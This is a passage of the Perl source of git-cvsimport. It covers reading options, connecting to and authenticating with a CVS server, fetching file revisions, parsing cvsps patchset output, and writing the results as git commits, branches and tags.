die("Failed to open $file for writing: $!");
foreach (keys %conv_author_name) {
print $f "$_=$conv_author_name{$_} <$conv_author_email{$_}>";
print $f " $conv_author_tz{$_}" if ($conv_author_tz{$_});
print $f "\n";
}
close ($f);
}
# Versions of perl before 5.10.0 may not automatically check $TZ each
# time localtime is run (most platforms will do so only the first time).
# We can work around this by using tzset() to update the internal
# variable whenever we change the environment.
sub set_timezone {
$ENV{TZ} = shift;
tzset();
}
# convert getopts specs for use by git config
my %longmap = (
'A:' => 'authors-file',
'M:' => 'merge-regex',
'P:' => undef,
'R' => 'track-revisions',
'S:' => 'ignore-paths',
);
sub read_repo_config {
# Split the string between characters, unless there is a ':'
# So "abc:de" becomes ["a", "b", "c:", "d", "e"]
my @opts = split(/ *(?!:)/, shift);
foreach my $o (@opts) {
my $key = $o;
$key =~ s/://g;
my $arg = 'git config';
$arg .= ' --bool' if ($o !~ /:$/);
my $ckey = $key;
if (exists $longmap{$o}) {
# An uppercase option like -R cannot be
# expressed in the configuration, as the
# variable names are downcased.
$ckey = $longmap{$o};
next if (! defined $ckey);
$ckey =~ s/-//g;
}
chomp(my $tmp = `$arg --get cvsimport.$ckey`);
if ($tmp && !($arg =~ /--bool/ && $tmp eq 'false')) {
no strict 'refs';
my $opt_name = "opt_" . $key;
if (!$$opt_name) {
$$opt_name = $tmp;
}
}
}
}
my $opts = "haivmkuo:d:p:r:C:z:s:M:P:A:S:L:R";
read_repo_config($opts);
Getopt::Long::Configure( 'no_ignore_case', 'bundling' );
# turn the Getopt::Std specification in a Getopt::Long one,
# with support for multiple -M options
GetOptions( map { s/:/=s/; /M/ ? "$_\@" : $_ } split( /(?!:)/, $opts ) )
or usage();
usage if $opt_h;
if (@ARGV == 0) {
chomp(my $module = `git config --get cvsimport.module`);
push(@ARGV, $module) if $? == 0;
}
@ARGV <= 1 or usage("You can't specify more than one CVS module");
if ($opt_d) {
$ENV{"CVSROOT"} = $opt_d;
} elsif (-f 'CVS/Root') {
open my $f, '<', 'CVS/Root' or die 'Failed to open CVS/Root';
$opt_d = <$f>;
chomp $opt_d;
close $f;
$ENV{"CVSROOT"} = $opt_d;
} elsif ($ENV{"CVSROOT"}) {
$opt_d = $ENV{"CVSROOT"};
} else {
usage("CVSROOT needs to be set");
}
$opt_s ||= "-";
$opt_a ||= 0;
my $git_tree = $opt_C;
$git_tree ||= ".";
my $remote;
if (defined $opt_r) {
$remote = 'refs/remotes/' . $opt_r;
$opt_o ||= "master";
} else {
$opt_o ||= "origin";
$remote = 'refs/heads';
}
my $cvs_tree;
if ($#ARGV == 0) {
$cvs_tree = $ARGV[0];
} elsif (-f 'CVS/Repository') {
open my $f, '<', 'CVS/Repository' or
die 'Failed to open CVS/Repository';
$cvs_tree = <$f>;
chomp $cvs_tree;
close $f;
} else {
usage("CVS module has to be specified");
}
our @mergerx = ();
if ($opt_m) {
@mergerx = ( qr/\b(?:from|of|merge|merging|merged) ([-\w]+)/i );
}
if (@opt_M) {
push (@mergerx, map { qr/$_/ } @opt_M);
}
# Remember UTC of our starting time
# we'll want to avoid importing commits
# that are too recent
our $starttime = time();
select(STDERR); $|=1; select(STDOUT);
package CVSconn;
# Basic CVS dialog.
# We're only interested in connecting and downloading, so ...
use File::Spec;
use File::Temp qw(tempfile);
use POSIX qw(strftime dup2);
sub new {
my ($what,$repo,$subdir) = @_;
$what=ref($what) if ref($what);
my $self = {};
$self->{'buffer'} = "";
bless($self,$what);
$repo =~ s#/+$##;
$self->{'fullrep'} = $repo;
$self->conn();
$self->{'subdir'} = $subdir;
$self->{'lines'} = undef;
return $self;
}
sub find_password_entry {
my ($cvspass, @cvsroot) = @_;
my ($file, $delim) = @$cvspass;
my $pass;
local ($_);
if (open(my $fh, $file)) {
# :pserver:cvs@mea.tmt.tele.fi:/cvsroot/zmailer Ah<Z
CVSPASSFILE:
while (<$fh>) {
chomp;
s/^\/\d+\s+//;
my ($w, $p) = split($delim,$_,2);
for my $cvsroot (@cvsroot) {
if ($w eq $cvsroot) {
$pass = $p;
last CVSPASSFILE;
}
}
}
close($fh);
}
return $pass;
}
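# conn - establish the connection to the CVS server.
#
# For :pserver: roots this opens a TCP socket (optionally through an HTTP
# CONNECT proxy), looks the password up in ~/.cvspass or ~/.cvs/cvspass when
# none was given in CVSROOT, and performs the pserver authentication
# handshake.  For :local:/:ext: roots it forks a "cvs server" process
# (optionally via $CVS_RSH).  In both cases it then sends the initial
# Root / Valid-responses / valid-requests exchange and remembers the socket
# handles in $self->{'socketo'} and $self->{'socketi'}.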
sub conn {
my $self = shift;
my $repo = $self->{'fullrep'};
if ($repo =~ s/^:pserver(?:([^:]*)):(?:(.*?)(?::(.*?))?@)?([^:\/]*)(?::(\d*))?//) {
my ($param,$user,$pass,$serv,$port) = ($1,$2,$3,$4,$5);
my ($proxyhost,$proxyport);
if ($param && ($param =~ m/proxy=([^;]+)/)) {
$proxyhost = $1;
# Default proxyport, if not specified, is 8080.
$proxyport = 8080;
if ($ENV{"CVS_PROXY_PORT"}) {
$proxyport = $ENV{"CVS_PROXY_PORT"};
}
if ($param =~ m/proxyport=([^;]+)/) {
$proxyport = $1;
}
}
$repo ||= '/';
# if username is not explicit in CVSROOT, then use current user, as cvs would
$user=(getlogin() || $ENV{'LOGNAME'} || $ENV{'USER'} || "anonymous") unless $user;
my $rr2 = "-";
unless ($port) {
$rr2 = ":pserver:$user\@$serv:$repo";
$port=2401;
}
my $rr = ":pserver:$user\@$serv:$port$repo";
if ($pass) {
$pass = $self->_scramble($pass);
} else {
my @cvspass = ([$ENV{'HOME'}."/.cvspass", qr/\s/],
[$ENV{'HOME'}."/.cvs/cvspass", qr/=/]);
my @loc = ();
foreach my $cvspass (@cvspass) {
my $p = find_password_entry($cvspass, $rr, $rr2);
if ($p) {
push @loc, $cvspass->[0];
$pass = $p;
}
}
if (1 < @loc) {
die("Multiple cvs password files have ".
"entries for CVSROOT $opt_d: @loc");
} elsif (!$pass) {
$pass = "A";
}
}
my ($s, $rep);
if ($proxyhost) {
# Use a HTTP Proxy. Only works for HTTP proxies that
# don't require user authentication
#
# See: http://www.ietf.org/rfc/rfc2817.txt
$s = IO::Socket::INET->new(PeerHost => $proxyhost, PeerPort => $proxyport);
die "Socket to $proxyhost: $!\n" unless defined $s;
$s->write("CONNECT $serv:$port HTTP/1.1\r\nHost: $serv:$port\r\n\r\n")
or die "Write to $proxyhost: $!\n";
$s->flush();
$rep = <$s>;
# The answer should look like 'HTTP/1.x 2yy ....'
if (!($rep =~ m#^HTTP/1\.. 2[0-9][0-9]#)) {
die "Proxy connect: $rep\n";
}
# Skip up to the empty line of the proxy server output
# including the response headers.
while ($rep = <$s>) {
last if (!defined $rep ||
$rep eq "\n" ||
$rep eq "\r\n");
}
} else {
$s = IO::Socket::INET->new(PeerHost => $serv, PeerPort => $port);
die "Socket to $serv: $!\n" unless defined $s;
}
$s->write("BEGIN AUTH REQUEST\n$repo\n$user\n$pass\nEND AUTH REQUEST\n")
or die "Write to $serv: $!\n";
$s->flush();
$rep = <$s>;
if ($rep ne "I LOVE YOU\n") {
$rep="<unknown>" unless $rep;
die "AuthReply: $rep\n";
}
$self->{'socketo'} = $s;
$self->{'socketi'} = $s;
} else { # local or ext: Fork off our own cvs server.
my $pr = IO::Pipe->new();
my $pw = IO::Pipe->new();
my $pid = fork();
die "Fork: $!\n" unless defined $pid;
my $cvs = 'cvs';
$cvs = $ENV{CVS_SERVER} if exists $ENV{CVS_SERVER};
my $rsh = 'rsh';
$rsh = $ENV{CVS_RSH} if exists $ENV{CVS_RSH};
my @cvs = ($cvs, 'server');
my ($local, $user, $host);
$local = $repo =~ s/:local://;
if (!$local) {
$repo =~ s/:ext://;
$local = !($repo =~ s/^(?:([^\@:]+)\@)?([^:]+)://);
($user, $host) = ($1, $2);
}
if (!$local) {
if ($user) {
unshift @cvs, $rsh, '-l', $user, $host;
} else {
unshift @cvs, $rsh, $host;
}
}
unless ($pid) {
$pr->writer();
$pw->reader();
dup2($pw->fileno(),0);
dup2($pr->fileno(),1);
$pr->close();
$pw->close();
exec(@cvs);
}
$pw->writer();
$pr->reader();
$self->{'socketo'} = $pw;
$self->{'socketi'} = $pr;
}
$self->{'socketo'}->write("Root $repo\n");
# Trial and error says that this probably is the minimum set
$self->{'socketo'}->write("Valid-responses ok error Valid-requests Mode M Mbinary E Checked-in Created Updated Merged Removed\n");
$self->{'socketo'}->write("valid-requests\n");
$self->{'socketo'}->flush();
my $rep=$self->readline();
die "Failed to read from server" unless defined $rep;
chomp($rep);
if ($rep !~ s/^Valid-requests\s*//) {
$rep="<unknown>" unless $rep;
die "Expected Valid-requests from server, but got: $rep\n";
}
chomp(my $res=$self->readline());
die "validReply: $res\n" if $res ne "ok";
$self->{'socketo'}->write("UseUnchanged\n") if $rep =~ /\bUseUnchanged\b/;
$self->{'repo'} = $repo;
}
sub readline {
my ($self) = @_;
return $self->{'socketi'}->getline();
}
sub _file {
# Request a file with a given revision.
# Trial and error says this is a good way to do it. :-/
my ($self,$fn,$rev) = @_;
$self->{'socketo'}->write("Argument -N\n") or return undef;
$self->{'socketo'}->write("Argument -P\n") or return undef;
# -kk: Linus' version doesn't use it - defaults to off
if ($opt_k) {
$self->{'socketo'}->write("Argument -kk\n") or return undef;
}
$self->{'socketo'}->write("Argument -r\n") or return undef;
$self->{'socketo'}->write("Argument $rev\n") or return undef;
$self->{'socketo'}->write("Argument --\n") or return undef;
$self->{'socketo'}->write("Argument $self->{'subdir'}/$fn\n") or return undef;
$self->{'socketo'}->write("Directory .\n") or return undef;
$self->{'socketo'}->write("$self->{'repo'}\n") or return undef;
# $self->{'socketo'}->write("Sticky T1.0\n") or return undef;
$self->{'socketo'}->write("co\n") or return undef;
$self->{'socketo'}->flush() or return undef;
$self->{'lines'} = 0;
return 1;
}
sub _line {
# Read a line from the server.
# ... except that 'line' may be an entire file. ;-)
my ($self, $fh) = @_;
die "Not in lines" unless defined $self->{'lines'};
my $line;
my $res=0;
while (defined($line = $self->readline())) {
# M U gnupg-cvs-rep/AUTHORS
# Updated gnupg-cvs-rep/
# /daten/src/rsync/gnupg-cvs-rep/AUTHORS
# /AUTHORS/1.1///T1.1
# u=rw,g=rw,o=rw
# 0
# ok
if ($line =~ s/^(?:Created|Updated) //) {
$line = $self->readline(); # path
$line = $self->readline(); # Entries line
my $mode = $self->readline(); chomp $mode;
$self->{'mode'} = $mode;
defined (my $cnt = $self->readline())
or die "EOF from server after 'Changed'\n";
chomp $cnt;
die "Duh: Filesize $cnt" if $cnt !~ /^\d+$/;
$line="";
$res = $self->_fetchfile($fh, $cnt);
} elsif ($line =~ s/^ //) {
print $fh $line;
$res += length($line);
} elsif ($line =~ /^M\b/) {
# output, do nothing
} elsif ($line =~ /^Mbinary\b/) {
my $cnt;
die "EOF from server after 'Mbinary'" unless defined ($cnt = $self->readline());
chomp $cnt;
die "Duh: Mbinary $cnt" if $cnt !~ /^\d+$/ or $cnt<1;
$line="";
$res += $self->_fetchfile($fh, $cnt);
} else {
chomp $line;
if ($line eq "ok") {
# print STDERR "S: ok (".length($res).")\n";
return $res;
} elsif ($line =~ s/^E //) {
# print STDERR "S: $line\n";
} elsif ($line =~ /^(Remove-entry|Removed) /i) {
$line = $self->readline(); # filename
$line = $self->readline(); # OK
chomp $line;
die "Unknown: $line" if $line ne "ok";
return -1;
} else {
die "Unknown: $line\n";
}
}
}
return undef;
}
sub file {
my ($self,$fn,$rev) = @_;
my $res;
my ($fh, $name) = tempfile('gitcvs.XXXXXX',
DIR => File::Spec->tmpdir(), UNLINK => 1);
$self->_file($fn,$rev) and $res = $self->_line($fh);
if (!defined $res) {
print STDERR "Server has gone away while fetching $fn $rev, retrying...\n";
truncate $fh, 0;
$self->conn();
	    $self->_file($fn,$rev) or die "No file command sent";
$res = $self->_line($fh);
die "Retry failed" unless defined $res;
}
close ($fh);
return ($name, $res);
}
sub _fetchfile {
my ($self, $fh, $cnt) = @_;
my $res = 0;
my $bufsize = 1024 * 1024;
while ($cnt) {
if ($bufsize > $cnt) {
$bufsize = $cnt;
}
my $buf;
my $num = $self->{'socketi'}->read($buf,$bufsize);
die "Server: Filesize $cnt: $num: $!\n" if not defined $num or $num<=0;
print $fh $buf;
$res += $num;
$cnt -= $num;
}
return $res;
}
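# _scramble - apply CVS's trivial pserver password scrambling: the result is
# the literal prefix "A" followed by each password byte substituted through
# the fixed table below (taken from cvs/src/scramble.c).  This is obfuscation,
# not encryption.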
sub _scramble {
my ($self, $pass) = @_;
my $scrambled = "A";
return $scrambled unless $pass;
my $pass_len = length($pass);
my @pass_arr = split("", $pass);
my $i;
# from cvs/src/scramble.c
my @shifts = (
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87,
111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105,
41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35,
125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56,
36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,
58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223,
225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,
199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,
174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,
207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,
192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,
227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,
182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,
243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152
);
for ($i = 0; $i < $pass_len; $i++) {
$scrambled .= pack("C", $shifts[ord($pass_arr[$i])]);
}
return $scrambled;
}
package main;
my $cvs = CVSconn->new($opt_d, $cvs_tree);
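# pdate - parse a cvsps timestamp of the form "YYYY/MM/DD HH:MM[:SS]" and
# return it as seconds since the epoch (interpreted as UTC via timegm).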
sub pdate($) {
my ($d) = @_;
	$d =~ m#(\d{2,4})/(\d\d)/(\d\d)\s(\d\d):(\d\d)(?::(\d\d))?#
or die "Unparseable date: $d\n";
my $y=$1; $y-=1900 if $y>1900;
return timegm($6||0,$5,$4,$3,$2-1,$y);
}
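# pmode - convert a CVS mode string such as "u=rw,g=rw,o=rw" into the
# corresponding octal permission bits (e.g. 0666) for git.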
sub pmode($) {
my ($mode) = @_;
my $m = 0;
my $mm = 0;
my $um = 0;
for my $x(split(//,$mode)) {
if ($x eq ",") {
$m |= $mm&$um;
$mm = 0;
$um = 0;
} elsif ($x eq "u") { $um |= 0700;
} elsif ($x eq "g") { $um |= 0070;
} elsif ($x eq "o") { $um |= 0007;
} elsif ($x eq "r") { $mm |= 0444;
} elsif ($x eq "w") { $mm |= 0222;
} elsif ($x eq "x") { $mm |= 0111;
} elsif ($x eq "=") { # do nothing
} else { die "Unknown mode: $mode\n";
}
}
$m |= $mm&$um;
return $m;
}
sub getwd() {
my $pwd = `pwd`;
chomp $pwd;
return $pwd;
}
sub is_sha1 {
my $s = shift;
return $s =~ /^[a-f0-9]{40}$/;
}
sub get_headref ($) {
my $name = shift;
my $r = `git rev-parse --verify '$name' 2>/dev/null`;
return undef unless $? == 0;
chomp $r;
return $r;
}
my $user_filename_prepend = '';
sub munge_user_filename {
my $name = shift;
return File::Spec->file_name_is_absolute($name) ?
$name :
$user_filename_prepend . $name;
}
-d $git_tree
or mkdir($git_tree,0777)
or die "Could not create $git_tree: $!";
if ($git_tree ne '.') {
$user_filename_prepend = getwd() . '/';
chdir($git_tree);
}
my $last_branch = "";
my $orig_branch = "";
my %branch_date;
my $tip_at_start = undef;
my $git_dir = $ENV{"GIT_DIR"} || ".git";
$git_dir = getwd()."/".$git_dir unless $git_dir =~ m#^/#;
$ENV{"GIT_DIR"} = $git_dir;
my $orig_git_index;
$orig_git_index = $ENV{GIT_INDEX_FILE} if exists $ENV{GIT_INDEX_FILE};
my %index; # holds filenames of one index per branch
unless (-d $git_dir) {
system(qw(git init));
die "Cannot init the GIT db at $git_tree: $?\n" if $?;
system(qw(git read-tree --empty));
die "Cannot init an empty tree: $?\n" if $?;
$last_branch = $opt_o;
$orig_branch = "";
} else {
open(F, "-|", qw(git symbolic-ref HEAD)) or
die "Cannot run git symbolic-ref: $!\n";
chomp ($last_branch = <F>);
$last_branch = basename($last_branch);
close(F);
unless ($last_branch) {
warn "Cannot read the last branch name: $! -- assuming 'master'\n";
$last_branch = "master";
}
$orig_branch = $last_branch;
$tip_at_start = `git rev-parse --verify HEAD`;
# Get the last import timestamps
my $fmt = '($ref, $author) = (%(refname), %(author));';
my @cmd = ('git', 'for-each-ref', '--perl', "--format=$fmt", $remote);
open(H, "-|", @cmd) or die "Cannot run git for-each-ref: $!\n";
while (defined(my $entry = <H>)) {
my ($ref, $author);
eval($entry) || die "cannot eval refs list: $@";
my ($head) = ($ref =~ m|^$remote/(.*)|);
$author =~ /^.*\s(\d+)\s[-+]\d{4}$/;
$branch_date{$head} = $1;
}
close(H);
if (!exists $branch_date{$opt_o}) {
die "Branch '$opt_o' does not exist.\n".
"Either use the correct '-o branch' option,\n".
"or import to a new repository.\n";
}
}
-d $git_dir
or die "Could not create git subdir ($git_dir).\n";
# now we read (and possibly save) author-info as well
-f "$git_dir/cvs-authors" and
read_author_info("$git_dir/cvs-authors");
if ($opt_A) {
read_author_info(munge_user_filename($opt_A));
write_author_info("$git_dir/cvs-authors");
}
# open .git/cvs-revisions, if requested
open my $revision_map, '>>', "$git_dir/cvs-revisions"
or die "Can't open $git_dir/cvs-revisions for appending: $!\n"
if defined $opt_R;
#
# run cvsps into a file unless we are getting
# it passed as a file via $opt_P
#
my $cvspsfile;
unless ($opt_P) {
print "Running cvsps...\n" if $opt_v;
my $pid = open(CVSPS,"-|");
my $cvspsfh;
die "Cannot fork: $!\n" unless defined $pid;
unless ($pid) {
my @opt;
@opt = split(/,/,$opt_p) if defined $opt_p;
unshift @opt, '-z', $opt_z if defined $opt_z;
unshift @opt, '-q' unless defined $opt_v;
unless (defined($opt_p) && $opt_p =~ m/--no-cvs-direct/) {
push @opt, '--cvs-direct';
}
exec("cvsps","--norc",@opt,"-u","-A",'--root',$opt_d,$cvs_tree);
die "Could not start cvsps: $!\n";
}
($cvspsfh, $cvspsfile) = tempfile('gitXXXXXX', SUFFIX => '.cvsps',
DIR => File::Spec->tmpdir());
while (<CVSPS>) {
print $cvspsfh $_;
}
close CVSPS;
$? == 0 or die "git cvsimport: fatal: cvsps reported error\n";
close $cvspsfh;
} else {
$cvspsfile = munge_user_filename($opt_P);
}
open(CVS, "<$cvspsfile") or die $!;
## cvsps output:
#---------------------
#PatchSet 314
#Date: 1999/09/18 13:03:59
#Author: wkoch
#Branch: STABLE-BRANCH-1-0
#Ancestor branch: HEAD
#Tag: (none)
#Log:
# See ChangeLog: Sat Sep 18 13:03:28 CEST 1999 Werner Koch
#Members:
# README:1.57->1.57.2.1
# VERSION:1.96->1.96.2.1
#
#---------------------
my $state = 0;
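# update_index - feed pending changes to "git update-index -z --index-info":
# paths in @$old become deletions (mode 0, null sha1), while entries in @$new
# are [mode, sha1, path] triples to add or update.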
sub update_index (\@\@) {
my $old = shift;
my $new = shift;
open(my $fh, '|-', qw(git update-index -z --index-info))
or die "unable to open git update-index: $!";
print $fh
(map { "0 0000000000000000000000000000000000000000\t$_\0" }
@$old),
(map { '100' . sprintf('%o', $_->[0]) . " $_->[1]\t$_->[2]\0" }
@$new)
or die "unable to write to git update-index: $!";
close $fh
or die "unable to write to git update-index: $!";
$? and die "git update-index reported error: $?";
}
sub write_tree () {
open(my $fh, '-|', qw(git write-tree))
or die "unable to open git write-tree: $!";
chomp(my $tree = <$fh>);
is_sha1($tree)
or die "Cannot get tree id ($tree): $!";
close($fh)
or die "Error running git write-tree: $?\n";
print "Tree ID $tree\n" if $opt_v;
return $tree;
}
my ($patchset,$date,$author_name,$author_email,$author_tz,$branch,$ancestor,$tag,$logmsg);
my (@old,@new,@skipped,%ignorebranch,@commit_revisions);
# commits that cvsps cannot place anywhere...
$ignorebranch{'#CVSPS_NO_BRANCH'} = 1;
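# commit - turn the changes collected for the current patchset (@old/@new)
# into a git commit on $branch: update the per-branch index, write a tree,
# create the commit object (detecting extra merge parents from the log
# message), advance the remote ref, record CVS revisions when -R was given,
# and create a tag if the patchset carried one.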
sub commit {
if ($branch eq $opt_o && !$index{branch} &&
!get_headref("$remote/$branch")) {
# looks like an initial commit
# use the index primed by git init
$ENV{GIT_INDEX_FILE} = "$git_dir/index";
$index{$branch} = "$git_dir/index";
} else {
# use an index per branch to speed up
# imports of projects with many branches
unless ($index{$branch}) {
$index{$branch} = tmpnam();
$ENV{GIT_INDEX_FILE} = $index{$branch};
if ($ancestor) {
system("git", "read-tree", "$remote/$ancestor");
} else {
system("git", "read-tree", "$remote/$branch");
}
die "read-tree failed: $?\n" if $?;
}
}
$ENV{GIT_INDEX_FILE} = $index{$branch};
update_index(@old, @new);
@old = @new = ();
my $tree = write_tree();
my $parent = get_headref("$remote/$last_branch");
print "Parent ID " . ($parent ? $parent : "(empty)") . "\n" if $opt_v;
my @commit_args;
push @commit_args, ("-p", $parent) if $parent;
# loose detection of merges
# based on the commit msg
foreach my $rx (@mergerx) {
next unless $logmsg =~ $rx && $1;
my $mparent = $1 eq 'HEAD' ? $opt_o : $1;
if (my $sha1 = get_headref("$remote/$mparent")) {
push @commit_args, '-p', "$remote/$mparent";
print "Merge parent branch: $mparent\n" if $opt_v;
}
}
set_timezone($author_tz);
# $date is in the seconds since epoch format
my $tz_offset = get_tz_offset($date);
my $commit_date = "$date $tz_offset";
set_timezone('UTC');
$ENV{GIT_AUTHOR_NAME} = $author_name;
$ENV{GIT_AUTHOR_EMAIL} = $author_email;
$ENV{GIT_AUTHOR_DATE} = $commit_date;
$ENV{GIT_COMMITTER_NAME} = $author_name;
$ENV{GIT_COMMITTER_EMAIL} = $author_email;
$ENV{GIT_COMMITTER_DATE} = $commit_date;
my $pid = open2(my $commit_read, my $commit_write,
'git', 'commit-tree', $tree, @commit_args);
# compatibility with git2cvs
substr($logmsg,32767) = "" if length($logmsg) > 32767;
$logmsg =~ s/[\s\n]+\z//;
if (@skipped) {
$logmsg .= "\n\n\nSKIPPED:\n\t";
$logmsg .= join("\n\t", @skipped) . "\n";
@skipped = ();
}
print($commit_write "$logmsg\n") && close($commit_write)
or die "Error writing to git commit-tree: $!\n";
print "Committed patch $patchset ($branch $commit_date)\n" if $opt_v;
chomp(my $cid = <$commit_read>);
is_sha1($cid) or die "Cannot get commit id ($cid): $!\n";
print "Commit ID $cid\n" if $opt_v;
close($commit_read);
waitpid($pid,0);
die "Error running git commit-tree: $?\n" if $?;
system('git' , 'update-ref', "$remote/$branch", $cid) == 0
or die "Cannot write branch $branch for update: $!\n";
if ($revision_map) {
print $revision_map "@$_ $cid\n" for @commit_revisions;
}
@commit_revisions = ();
if ($tag) {
my ($xtag) = $tag;
$xtag =~ s/\s+\*\*.*$//; # Remove stuff like ** INVALID ** and ** FUNKY **
$xtag =~ tr/_/\./ if ( $opt_u );
$xtag =~ s/[\/]/$opt_s/g;
# See refs.c for these rules.
# Tag cannot contain bad chars. (See bad_ref_char in refs.c.)
$xtag =~ s/[ ~\^:\\\*\?\[]//g;
# Other bad strings for tags:
# (See check_refname_component in refs.c.)
1 while $xtag =~ s/
(?: \.\. # Tag cannot contain '..'.
| \@{ # Tag cannot contain '@{'.
| ^ - # Tag cannot begin with '-'.
| \.lock $ # Tag cannot end with '.lock'.
| ^ \. # Tag cannot begin...
| \. $ # ...or end with '.'
)//xg;
# Tag cannot be empty.
if ($xtag eq '') {
warn("warning: ignoring tag '$tag'",
" with invalid tagname\n");
return;
}
if (system('git' , 'tag', '-f', $xtag, $cid) != 0) {
# We did our best to sanitize the tag, but still failed
# for whatever reason. Bail out, and give the user
# enough information to understand if/how we should
# improve the translation in the future.
if ($tag ne $xtag) {
print "Translated '$tag' tag to '$xtag'\n";
}
die "Cannot create tag $xtag: $!\n";
}
print "Created tag '$xtag' on '$branch'\n" if $opt_v;
}
};
my $commitcount = 1;
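# Parse the cvsps output with a small state machine:
#   0/1  at or just after a "-----" patchset separator
#   2-7  reading the PatchSet, Date, Author, Branch, Ancestor branch and Tag
#        headers, in that order
#   8    accumulating the log message until "Members:"
#   9/10 reading member lines (file revision ranges), then the trailing blank
#   11   skipping the remainder of a patchset we decided not to import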
while (<CVS>) {
chomp;
if ($state == 0 and /^-+$/) {
$state = 1;
} elsif ($state == 0) {
$state = 1;
redo;
} elsif (($state==0 or $state==1) and s/^PatchSet\s+//) {
$patchset = 0+$_;
$state=2;
} elsif ($state == 2 and s/^Date:\s+//) {
$date = pdate($_);
unless ($date) {
print STDERR "Could not parse date: $_\n";
$state=0;
next;
}
$state=3;
} elsif ($state == 3 and s/^Author:\s+//) {
$author_tz = "UTC";
s/\s+$//;
if (/^(.*?)\s+<(.*)>/) {
($author_name, $author_email) = ($1, $2);
} elsif ($conv_author_name{$_}) {
$author_name = $conv_author_name{$_};
$author_email = $conv_author_email{$_};
$author_tz = $conv_author_tz{$_} if ($conv_author_tz{$_});
} else {
$author_name = $author_email = $_;
}
$state = 4;
} elsif ($state == 4 and s/^Branch:\s+//) {
s/\s+$//;
tr/_/\./ if ( $opt_u );
s/[\/]/$opt_s/g;
$branch = $_;
$state = 5;
} elsif ($state == 5 and s/^Ancestor branch:\s+//) {
s/\s+$//;
$ancestor = $_;
$ancestor = $opt_o if $ancestor eq "HEAD";
$state = 6;
} elsif ($state == 5) {
$ancestor = undef;
$state = 6;
redo;
} elsif ($state == 6 and s/^Tag:\s+//) {
s/\s+$//;
if ($_ eq "(none)") {
$tag = undef;
} else {
$tag = $_;
}
$state = 7;
} elsif ($state == 7 and /^Log:/) {
$logmsg = "";
$state = 8;
} elsif ($state == 8 and /^Members:/) {
$branch = $opt_o if $branch eq "HEAD";
if (defined $branch_date{$branch} and $branch_date{$branch} >= $date) {
# skip
print "skip patchset $patchset: $date before $branch_date{$branch}\n" if $opt_v;
$state = 11;
next;
}
if (!$opt_a && $starttime - 300 - (defined $opt_z ? $opt_z : 300) <= $date) {
# skip if the commit is too recent
# given that the cvsps default fuzz is 300s, we give ourselves another
# 300s just in case -- this also prevents skipping commits
# due to server clock drift
print "skip patchset $patchset: $date too recent\n" if $opt_v;
$state = 11;
next;
}
if (exists $ignorebranch{$branch}) {
print STDERR "Skipping $branch\n";
$state = 11;
next;
}
if ($ancestor) {
if ($ancestor eq $branch) {
print STDERR "Branch $branch erroneously stems from itself -- changed ancestor to $opt_o\n";
$ancestor = $opt_o;
}
if (defined get_headref("$remote/$branch")) {
print STDERR "Branch $branch already exists!\n";
$state=11;
next;
}
my $id = get_headref("$remote/$ancestor");
if (!$id) {
print STDERR "Branch $ancestor does not exist!\n";
$ignorebranch{$branch} = 1;
$state=11;
next;
}
system(qw(git update-ref -m cvsimport),
"$remote/$branch", $id);
if($? != 0) {
print STDERR "Could not create branch $branch\n";
$ignorebranch{$branch} = 1;
$state=11;
next;
}
}
$last_branch = $branch if $branch ne $last_branch;
$state = 9;
} elsif ($state == 8) {
$logmsg .= "$_\n";
} elsif ($state == 9 and /^\s+(.+?):(INITIAL|\d+(?:\.\d+)+)->(\d+(?:\.\d+)+)\s*$/) {
# VERSION:1.96->1.96.2.1
my $init = ($2 eq "INITIAL");
my $fn = $1;
my $rev = $3;
$fn =~ s#^/+##;
if ($opt_S && $fn =~ m/$opt_S/) {
print "SKIPPING $fn v $rev\n";
push(@skipped, $fn);
next;
}
push @commit_revisions, [$fn, $rev];
print "Fetching $fn v $rev\n" if $opt_v;
my ($tmpname, $size) = $cvs->file($fn,$rev);
if ($size == -1) {
push(@old,$fn);
print "Drop $fn\n" if $opt_v;
} else {
print "".($init ? "New" : "Update")." $fn: $size bytes\n" if $opt_v;
my $pid = open(my $F, '-|');
die $! unless defined $pid;
if (!$pid) {
exec("git", "hash-object", "-w", $tmpname)
or die "Cannot create object: $!\n";
}
my $sha = <$F>;
chomp $sha;
close $F;
my $mode = pmode($cvs->{'mode'});
push(@new,[$mode, $sha, $fn]); # may be resurrected!
}
unlink($tmpname);
} elsif ($state == 9 and /^\s+(.+?):\d+(?:\.\d+)+->(\d+(?:\.\d+)+)\(DEAD\)\s*$/) {
my $fn = $1;
my $rev = $2;
$fn =~ s#^/+##;
push @commit_revisions, [$fn, $rev];
push(@old,$fn);
print "Delete $fn\n" if $opt_v;
} elsif ($state == 9 and /^\s*$/) {
$state = 10;
} elsif (($state == 9 or $state == 10) and /^-+$/) {
$commitcount++;
if ($opt_L && $commitcount > $opt_L) {
last;
}
commit();
if (($commitcount & 1023) == 0) {
system(qw(git repack -a -d));
}
$state = 1;
} elsif ($state == 11 and /^-+$/) {
$state = 1;
} elsif (/^-+$/) { # end of unknown-line processing
$state = 1;
} elsif ($state != 11) { # ignore stuff when skipping
print STDERR "* UNKNOWN LINE * $_\n";
}
}
commit() if $branch and $state != 11;
unless ($opt_P) {
unlink($cvspsfile);
}
# The heuristic of repacking every 1024 commits can leave a
# lot of unpacked data. If there is more than 1MB worth of
# not-packed objects, repack once more.
my $line = `git count-objects`;
if ($line =~ /^(\d+) objects, (\d+) kilobytes$/) {
my ($n_objects, $kb) = ($1, $2);
1024 < $kb
and system(qw(git repack -a -d));
}
foreach my $git_index (values %index) {
if ($git_index ne "$git_dir/index") {
unlink($git_index);
}
}
